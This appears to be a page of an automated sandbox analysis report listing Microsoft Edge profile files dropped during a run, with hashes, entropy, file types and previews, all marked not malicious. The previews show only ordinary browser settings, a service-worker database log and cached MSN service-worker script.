                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF25857.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9510
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947106727321153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:sVWckdptD2RJ156b9xzwaYCLsd85Th6mp9/x+6M8muec5m1eAeCAe4zvrU2iHQyP:sVhkdpqJj4waYCLC8Rpj+FimQAqU9df
                                                                                                                                                                                                                                                                                                MD5:5B58B774AA294D703013BE6937DE2677
                                                                                                                                                                                                                                                                                                SHA1:B8EB6031D94AEAD3393856100DFDB3104192D604
                                                                                                                                                                                                                                                                                                SHA-256:6A425C879B20CA44DE9C9B60EB4B7E0D80C4D102A29C3E514D231FDE405FB7CA
                                                                                                                                                                                                                                                                                                SHA-512:225F00E6637D933646D1DDA56DC58630CBD9DCBA1217C3305E9B321CB7C3DDC71093E2F840092694A0B52CC51FC96FB87CE15755DF4724573DF61D00FFA25D0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF28841.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9510
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947106727321153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:sVWckdptD2RJ156b9xzwaYCLsd85Th6mp9/x+6M8muec5m1eAeCAe4zvrU2iHQyP:sVhkdpqJj4waYCLC8Rpj+FimQAqU9df
                                                                                                                                                                                                                                                                                                MD5:5B58B774AA294D703013BE6937DE2677
                                                                                                                                                                                                                                                                                                SHA1:B8EB6031D94AEAD3393856100DFDB3104192D604
                                                                                                                                                                                                                                                                                                SHA-256:6A425C879B20CA44DE9C9B60EB4B7E0D80C4D102A29C3E514D231FDE405FB7CA
                                                                                                                                                                                                                                                                                                SHA-512:225F00E6637D933646D1DDA56DC58630CBD9DCBA1217C3305E9B321CB7C3DDC71093E2F840092694A0B52CC51FC96FB87CE15755DF4724573DF61D00FFA25D0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2dcd9.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9510
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947106727321153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:sVWckdptD2RJ156b9xzwaYCLsd85Th6mp9/x+6M8muec5m1eAeCAe4zvrU2iHQyP:sVhkdpqJj4waYCLC8Rpj+FimQAqU9df
                                                                                                                                                                                                                                                                                                MD5:5B58B774AA294D703013BE6937DE2677
                                                                                                                                                                                                                                                                                                SHA1:B8EB6031D94AEAD3393856100DFDB3104192D604
                                                                                                                                                                                                                                                                                                SHA-256:6A425C879B20CA44DE9C9B60EB4B7E0D80C4D102A29C3E514D231FDE405FB7CA
                                                                                                                                                                                                                                                                                                SHA-512:225F00E6637D933646D1DDA56DC58630CBD9DCBA1217C3305E9B321CB7C3DDC71093E2F840092694A0B52CC51FC96FB87CE15755DF4724573DF61D00FFA25D0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF31771.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):9510
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947106727321153
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:sVWckdptD2RJ156b9xzwaYCLsd85Th6mp9/x+6M8muec5m1eAeCAe4zvrU2iHQyP:sVhkdpqJj4waYCLC8Rpj+FimQAqU9df
                                                                                                                                                                                                                                                                                                MD5:5B58B774AA294D703013BE6937DE2677
                                                                                                                                                                                                                                                                                                SHA1:B8EB6031D94AEAD3393856100DFDB3104192D604
                                                                                                                                                                                                                                                                                                SHA-256:6A425C879B20CA44DE9C9B60EB4B7E0D80C4D102A29C3E514D231FDE405FB7CA
                                                                                                                                                                                                                                                                                                SHA-512:225F00E6637D933646D1DDA56DC58630CBD9DCBA1217C3305E9B321CB7C3DDC71093E2F840092694A0B52CC51FC96FB87CE15755DF4724573DF61D00FFA25D0C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"aadc_info":{"age_group":0},"account_id_migration_state":2,"account_tracker_service_last_update":"13385951010462368","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"list":[]},"data_reduction":{"daily_original_length":["0","0","0","0","0","0","0","0","0","0","0","0

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\PreferredApps

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):33
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.051821770808046
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:YVXADAEvTLSJ:Y9AcEvHSJ
                                                                                                                                                                                                                                                                                                MD5:2B432FEF211C69C745ACA86DE4F8E4AB
                                                                                                                                                                                                                                                                                                SHA1:4B92DA8D4C0188CF2409500ADCD2200444A82FCC
                                                                                                                                                                                                                                                                                                SHA-256:42B55D126D1E640B1ED7A6BDCB9A46C81DF461FA7E131F4F8C7108C2C61C14DE
                                                                                                                                                                                                                                                                                                SHA-512:948502DE4DC89A7E9D2E1660451FCD0F44FD3816072924A44F145D821D0363233CC92A377DBA3A0A9F849E3C17B1893070025C369C8120083A622D025FE1EACF
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"preferred_apps":[],"version":1}

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24853
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.566152891841855
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:GRF/SpWP0SfyB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVLyaI3rwkp6tuT:GRF/SpWP0SfyBu1jaS3IkZts
                                                                                                                                                                                                                                                                                                MD5:B78455B54DF32F2EF1B22687C86582A6
                                                                                                                                                                                                                                                                                                SHA1:94417439CFDAE74E8D04AA88B625C622B52982C1
                                                                                                                                                                                                                                                                                                SHA-256:0B8756AC17E887BA3C0F178833AB2A12EA5935F15EBB4463043FD0D074A04115
                                                                                                                                                                                                                                                                                                SHA-512:37E38B0987E9E21E8F6549D424C0B6686FEFCE1F8F60416743345B24917C23FFFC464F4BEEED78D3BDC448DDBBCD896C2EA5D5AB38727C9B5CDCAA228321E34C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385951009736498","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385951009736498","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF25e23.TMP (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24853
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.566152891841855
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:768:GRF/SpWP0SfyB8F1+UoAYDCx9Tuqh0VfUC9xbog/OVLyaI3rwkp6tuT:GRF/SpWP0SfyBu1jaS3IkZts
                                                                                                                                                                                                                                                                                                MD5:B78455B54DF32F2EF1B22687C86582A6
                                                                                                                                                                                                                                                                                                SHA1:94417439CFDAE74E8D04AA88B625C622B52982C1
                                                                                                                                                                                                                                                                                                SHA-256:0B8756AC17E887BA3C0F178833AB2A12EA5935F15EBB4463043FD0D074A04115
                                                                                                                                                                                                                                                                                                SHA-512:37E38B0987E9E21E8F6549D424C0B6686FEFCE1F8F60416743345B24917C23FFFC464F4BEEED78D3BDC448DDBBCD896C2EA5D5AB38727C9B5CDCAA228321E34C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13385951009736498","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13385951009736498","location":5,"ma

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):2403
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.809758687494745
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:F2emafrd6efx5Mrd1sOLIrd6Bx5jrdPx5D:F1mafx6eQx1sWIx6pxv
                                                                                                                                                                                                                                                                                                MD5:214460464C7890C85354EC1C7C5A18DB
                                                                                                                                                                                                                                                                                                SHA1:0A79847B603BE119D2CFB80B9033569038A93328
                                                                                                                                                                                                                                                                                                SHA-256:8DE66258227C840173E6EED3465A96163202383244DD190A6610FD18BE073BCD
                                                                                                                                                                                                                                                                                                SHA-512:CF6A46BEB97831F85F8EC218ADE05DAA26F459A4E1DBE23E65A963B954EE85720A5C321274D8913E1652A216ADBAC83B8AFEF8F552DBB623FC2E97320B3F277A
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..Q.................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableE

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):16
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):297
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.1731901069107264
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:6:iOvQlR71wkn23oH+TcwtE/a252KLlNSvUqq2Pwkn23oH+TcwtE/a2ZIFUv:7YLafYeb8xLWLvYfYeb8J2FUv
                                                                                                                                                                                                                                                                                                MD5:9F208D493C964316575CF47C27BF1B10
                                                                                                                                                                                                                                                                                                SHA1:9C6B70553DEB5F36C156986C58502CCC25EDF21C
                                                                                                                                                                                                                                                                                                SHA-256:9F3F9224D8D92BDBFD99A4B6B19D2540A19FBE10AAA0EC1B4089DC46A71D1D56
                                                                                                                                                                                                                                                                                                SHA-512:BFB0A3FC3B4B4AB3FD64E1E2D18580A3C047BD5DA813B7B3EED56901047CCC0CC7F0E230401E801F2B77A8539811FC7FE3D54BEF8C52365E433B29AF25986A6C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:2025/03/08-18:43:50.141 14b0 Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/03/08-18:43:50.160 14b0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):41
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):117676
                                                                                                                                                                                                                                                                                                Entropy (8bit):5.575744953906632
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:1536:Zx906yxPXfO4O1ppoe4ML/NHHNeeEMCjP+N7hQPvWlac5:j9LyxPXfO4O1pue4ML/VNeeEMrWvU5
                                                                                                                                                                                                                                                                                                MD5:79265D9C64A45C94B02000DF8380C57B
                                                                                                                                                                                                                                                                                                SHA1:F6CC92132F0F086D6CA2B563AB07290F7FC34F90
                                                                                                                                                                                                                                                                                                SHA-256:1134501B004935C7A096B6F7D350CAB5AA4CD51733DCD00B9F82C8CB595BEEAF
                                                                                                                                                                                                                                                                                                SHA-512:FC81CAD4F44649691E459CF84ED0FCA742A1DFE01A533E828D0239EC7B4A952A1462E07B8EF53DF9547BBA0E076188C9B109C4D990815DD16E95AB2416AF5449
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):196353
                                                                                                                                                                                                                                                                                                Entropy (8bit):6.388940334180667
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:XelekxqSmnGzwjUiuPUL/9fHFBXg6aSv0ZV1I/OqNPhvecfhG7AfLGB5tjxOCEEE:6NxzwzucL/hlBfacGGQe
                                                                                                                                                                                                                                                                                                MD5:23B59A19BA27553802A3994599FE51FA
                                                                                                                                                                                                                                                                                                SHA1:5423D1749D23EF191608E1D4D0C30CADD2C5249E
                                                                                                                                                                                                                                                                                                SHA-256:3B5C3A13B17B04D68DCA8CC2A8633DF4B04500AEA47E735A00038F1BE0DEA3D6
                                                                                                                                                                                                                                                                                                SHA-512:6CD67C1376929886D385DF1D53792B0DABE583E25032A07823D726025716B34D303595973B4F30CE0B88CFD602291F0B841F6E53AE65C0BFB272AF57B9BC359E
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:0\r..m..........rSG.....0....Lp.................;.......*.........,T.8..`,.....L`.....,T...`......L`......Rc...m....exports...Rc...X....module....Rcjn3.....define....Rb........amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q......7{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`........A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....rs...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):24
                                                                                                                                                                                                                                                                                                Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
